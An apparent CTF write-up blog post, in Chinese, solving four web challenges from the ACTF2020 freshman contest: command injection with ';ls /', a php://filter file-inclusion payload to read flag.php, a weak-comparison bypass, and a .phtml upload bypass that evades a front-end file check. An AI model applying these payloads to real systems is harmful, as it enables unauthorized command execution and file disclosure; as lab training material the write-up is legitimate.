ACTF2020新生赛
[ACTF2020 新生赛]Exec
一个非常简单的命令执行
1 | ;ls / |
[ACTF2020 新生赛]Include
随便怎么打都通,vps
远程包含,filter
协议等等
1 | ?file=php://filter/convert.base64-encode/resource=flag.php |
[ACTF2020 新生赛]BackupFile
题目提示直接访问/index.php.bak
1 |
|
弱比较很好绕过
1 | ?key=123 |
[ACTF2020 新生赛]Upload
上传phtml
即可
1 | GIF89a |
但是上传之后,又不行后缀被改了,看一下源码,把前端函数删了再来
1 | <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> |
1 | function checkFile() { |
都说要删除前端,但是我没有遇到这种情况,我只遇到这种情况就是上传phtml
后缀变成了html
,然后我就刷了两三次靶机,终于上传成功
1 | http://5f8c9914-8682-41c5-83f5-f965ac9924be.node5.buuoj.cn:81/uplo4d/2bbe77e4124ea49444bcd94bfd811898.phtml |
- Title: ACTF2020新生赛
- Author: baozongwi
- Created at : 2024-08-11 15:02:08
- Updated at : 2024-09-14 15:40:57
- Link: https://baozongwi.xyz/2024/08/11/ACTF2020新生赛/
- License: This work is licensed under CC BY-NC-SA 4.0.
Comments